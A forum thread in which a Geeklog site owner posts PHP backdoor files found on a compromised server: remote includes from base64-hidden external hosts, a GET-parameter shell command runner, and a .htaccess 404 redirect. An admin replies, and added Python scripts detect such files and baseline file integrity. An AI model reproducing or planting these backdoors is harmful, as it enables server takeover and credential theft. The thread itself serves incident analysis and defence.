Geeklog Forums

hacking a family site


hacked

Anonymous
I've recently found these files strewn throughout my system dirs by various names and .htaccess files providing redirects to them from a 404 (or something like that):
first file:
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>


second file:
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>


and the .htaccess file:
Options -MultiViews
ErrorDocument 404 /mysite/geeklogdir/plugins/someplugin/includes.php

What's up with that? How could these files have gotten there, and what do they do? I'm deleting them as I find them. They are in a whole bunch of directories. ...and I don't have a clue how to read server logs.
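The two PHP files and the .htaccess quoted above can be triaged offline before they are deleted. The script below is an added example, not code from this thread or from Geeklog: it decodes every `base64_decode("...")` literal so the remote hosts the scripts contact become readable, and it flags the constructs that make a dropped PHP file or .htaccess suspicious (a remote include built from base64, `system()` fed from `$_GET`, shell backticks, `error_reporting(0)`, and an `ErrorDocument 404` that points at a `.php` file). The indicator list is the author's own choice, and the sample inputs are constructed, shortened copies of the posted code.

```python
"""Triage helper for dropped PHP files and .htaccess redirects (added example)."""
import base64
import re

# Indicator patterns, chosen for this example; each is weak alone, strong together.
INDICATORS = {
    "remote_include_from_base64": re.compile(r"include(?:_once)?\s*\(\s*base64_decode\("),
    "system_from_request": re.compile(r"system\s*\(\s*\$_(?:GET|POST|REQUEST)\["),
    "shell_backticks": re.compile(r"`[^`]*uname[^`]*`"),
    "error_reporting_off": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "404_redirect_to_php": re.compile(r"^\s*ErrorDocument\s+404\s+\S+\.php\s*$", re.M),
}

# A base64 literal passed straight to base64_decode(), as in the posted files.
B64_ARG = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')


def decode_base64_literals(src):
    """Return the decoded string for every base64_decode("...") literal in src.

    Literals that are not valid base64 or not UTF-8 are returned as repr()
    so the caller still sees that something was there.
    """
    out = []
    for m in B64_ARG.finditer(src):
        raw = m.group(1)
        try:
            out.append(base64.b64decode(raw, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            out.append(repr(raw))
    return out


def find_indicators(src):
    """Return the sorted list of indicator names that match src."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(src))


def triage(path, src):
    """Summarise one file: which indicators fired and what its base64 hides."""
    return {"path": path, "indicators": find_indicators(src),
            "decoded": decode_base64_literals(src)}


# Constructed samples: shortened copies of the three files quoted in the post.
SAMPLE_FIRST = r'''<? error_reporting(0);$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$str=base64_encode($a).".$s";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){}
else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>'''

SAMPLE_SECOND = r'''<?php
error_reporting(0);
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR)))))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>'''

SAMPLE_HTACCESS = "Options -MultiViews\nErrorDocument 404 /mysite/geeklogdir/plugins/someplugin/includes.php\n"

# A benign control: a normal include and a 404 page that is not PHP.
SAMPLE_BENIGN = "<?php require_once('lib-common.php'); ?>\nErrorDocument 404 /404.html\n"

if __name__ == "__main__":
    for path, src in [("first_file.php", SAMPLE_FIRST), ("second_file.php", SAMPLE_SECOND),
                      (".htaccess", SAMPLE_HTACCESS), ("benign.php", SAMPLE_BENIGN)]:
        print(triage(path, src))
```

Decoding shows that the first file forwards the request details to one of two external hosts and the second one pulls its body from a third; a PHP `include()` of a URL only works when the server's PHP configuration permits remote includes, so confirming that it is disabled is a reasonable follow-up check on the affected hosts.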


Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Which Geeklog version are you on?

Unfortunately, we had a few issues recently that allowed attackers to execute arbitrary code - which means that they could do just about anything, including creating or uploading new files.

bye, Dirk

hacked

Anonymous
I found the files while upgrading to 1.4sr5, but the modification date of the files shows that they were created when I was still running 1.3.11sr1.

Upgrade went fine, by the way.

The Geeklog dir was inside the doc root, but it was (per the install instructions) renamed and password protected. The files I mentioned above were found in this password-protected dir as well as in many publicly accessible directories.

I found these files across 3 domains and 2 subdomains, all on the same server obviously, involving not only Geeklog installations but 2 WordPress installations as well. I found them mostly in directories named: data, backups, logs, userphotos, articles, default, and a few others that I can't remember.

HOLY CRAP! I just found that the username and password in the config.php file (of the installation with the gl dir outside the web root) were changed. The new username was also added to the database with all privileges. wtf?!
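Finding dropped files by hand across several domains, and noticing a changed config.php only by luck, is what a hash manifest is for. The script below is an added example, not code from this thread or from Geeklog: it records a SHA-256 digest of every file under a web root once the tree is known clean (for instance right after a fresh upgrade), later diffs the tree against that record, and flags the two things seen in this post, new `.php` or `.htaccess` files and a modified `config.php` or a change inside a data-only directory. The directory names it treats as data-only mirror the ones listed above, and the demo tree and its contents are constructed.

```python
"""File-integrity baseline for a web tree (added example)."""
import hashlib
import os
import shutil
import tempfile

# Directories that should hold data only, never PHP; list mirrors the post.
DATA_DIRS = ("data/", "backups/", "logs/", "userphotos/", "articles/")


def sha256_file(path):
    """SHA-256 hex digest of one file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map relative path -> digest for every regular file under root (symlinks skipped)."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic walk order
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def diff_manifests(baseline, current):
    """Sorted lists of paths that are new, changed, or gone since the baseline."""
    return {
        "added": sorted(p for p in current if p not in baseline),
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
    }


def suspicious(diff):
    """Reduce a diff to the findings worth a human's attention."""
    flagged = []
    for p in diff["added"]:
        if p.endswith((".php", ".htaccess")):
            flagged.append(("new executable or rewrite file", p))
    for p in diff["modified"]:
        if os.path.basename(p) == "config.php" or p.startswith(DATA_DIRS):
            flagged.append(("changed config or data-dir file", p))
    return flagged


def _write(root, rel, text):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as fh:
        fh.write(text)


def demo():
    """Constructed tree: baseline, then the kind of changes described in the post."""
    root = tempfile.mkdtemp()
    try:
        _write(root, "config.php", "<?php $_DB_user = 'gl_user'; ?>")      # constructed
        _write(root, "data/readme.txt", "data directory")                   # constructed
        baseline = build_manifest(root)
        # constructed compromise: credentials rewritten, PHP and .htaccess dropped into data/
        _write(root, "config.php", "<?php $_DB_user = 'added_user'; ?>")
        _write(root, "data/includes.php", "<?php /* placeholder body */ ?>")
        _write(root, "data/.htaccess", "ErrorDocument 404 /data/includes.php\n")
        return diff_manifests(baseline, build_manifest(root))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    d = demo()
    for kind, path in suspicious(d):
        print(f"{kind}: {path}")
```

Store the baseline outside the web root (or on another machine) so an attacker who can write PHP into the tree cannot also rewrite the record they are being compared against; that is the same point Dirk makes below about password protection not constraining code that already runs on the server.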


Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Sounds really bad.

The password protection will only help against access from the outside (e.g. via the browser), but won't help when you can run your own PHP scripts (or Geeklog itself wouldn't be able to access the files in the password-protected directories). So, as I wrote above, once you can execute your own PHP code on someone else's server, pretty much everything is possible ...

bye, Dirk